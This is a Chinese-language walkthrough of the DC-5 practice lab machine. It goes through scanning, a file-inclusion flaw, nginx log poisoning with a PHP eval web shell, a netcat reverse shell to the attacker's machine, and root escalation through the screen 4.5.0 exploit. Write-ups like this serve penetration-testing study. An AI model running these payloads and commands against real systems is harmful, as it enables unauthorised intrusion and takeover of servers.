DC-5靶机

DC-5文档

信息收集

靶机MAC地址：00:0C:29:CB:E4:31

主机扫描

netdiscover -r 192.168.80.0/24

端口扫描

nmap -sV -p- 192.168.80.139

漏洞发现

浏览器访问80端口

找找有没有能够利用的地方，在Contact里发现了类似提交的 东西

发现点击Submit提交后，页面会发生变化

用bp抓包看看

将抓取到的数据包发送到Repeater，点击Send查看返回的数据

不断点击，发现footer不断变化，说明这里可能存在一个独立的脚本文件

爆破一下目录看看

dirsearch -u 192.168.80.139 -i 200

浏览器访问这个http://192.168.80.139/footer.php 目录

每点击一次页面上的数字就会变

改成文件包含的形式?file=发现同样可以

确定这里存在文件包含漏洞

漏洞利用

改变访问路径为/thankyou.php?file=/etc/passwd ，可以看到passwd文件内容了

说明了程序代码在处理包含文件的时候没有严格控制。我们可以把访问路径更改为木马文件

 /thankyou<?php @eval($_REQUEST[123]);?>

发现报 404未找到的错误

对于配置了nginx的网站，无论网站有什么操作，都会被记录在/var/log/nginx/access.log和/var/log/nginx/error.log里面

/thankyou.php?file=/var/log/nginx/access.log

木马已经上传，利用中国蚁剑来连接访问

http://192.168.80.139/thankyou.php?file=/var/log/nginx/access.log

接下来进行反弹shell

kali开启监听

nc -lvvp 8989 

利用中国蚁剑打开虚拟终端，反弹shell到攻击机kali上

nc -e /bin/bash 192.168.80.141 8989

再看kali这边 ，就已经监听到了

使用python脚本开启交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

查看当前权限，发现只是普通的权限

下一步就该提权了

权限提升

find / -user root -perm /4000 2>/dev/null

发现screen-4.5.0比较可疑，尝试用searchsploit搜索是否存在漏洞

再打开一个终端，进行漏洞查找

searchsploit screen 4.5.0

找出41154.sh的绝对路径

searchsploit -p linux/local/41154.sh

查看文件内容

cat /usr/share/exploitdb/exploits/linux/local/41154.sh 

按照文件的说明，可分为三部分，将第一个框里内容保存为第一文件，名为libhax.c，然后使用黄色选取的命令编译，编译结束会生成libhax.so文件。

第二个框里内容保存为rootshell.c文件，使用黄色选区的命令编译，编译结束后生成rootshell文件。

将第三个框里内容保存为第三个文件，保存为run.sh 。 这个名字随意。

第一个文件

第二个文件

第三个文件

把libhax.c和rootshell.c拖进 蚁剑

对libhax.c和rootshell.c这两个文件进行编译

进到蚁剑的文件管理里面，刷新一下，就能看到编译好的两个文件了

然后把run.sh也拖进蚁剑里来， 注意是/tmp下

这个时候可以把libhax.c和rootshell.c这两个文件删除 ，因为已经编译好了，留他们也没有用了

进到kali的python交互shell里，切换到/tmp目录下

运行run.sh 输入bash ./run.sh 提权

可以进行whoami查看我是谁

进到/root查看有无flag

总结

信息收集
	主机发现  netdiscouver
	端口扫描  nmap
	目录爆破  dirsearch
漏洞利用
	bp抓包分析footer.php,有文件包含漏洞
	木马上传，查看日志
	反弹shell
	python交互shell
提权
	find / -user root -perm /4000 2>/dev/null
	searchsploit screen 4.5.0
	libhax.c和rootshell.c文件的编译  run.sh
	bash ./run.sh  提权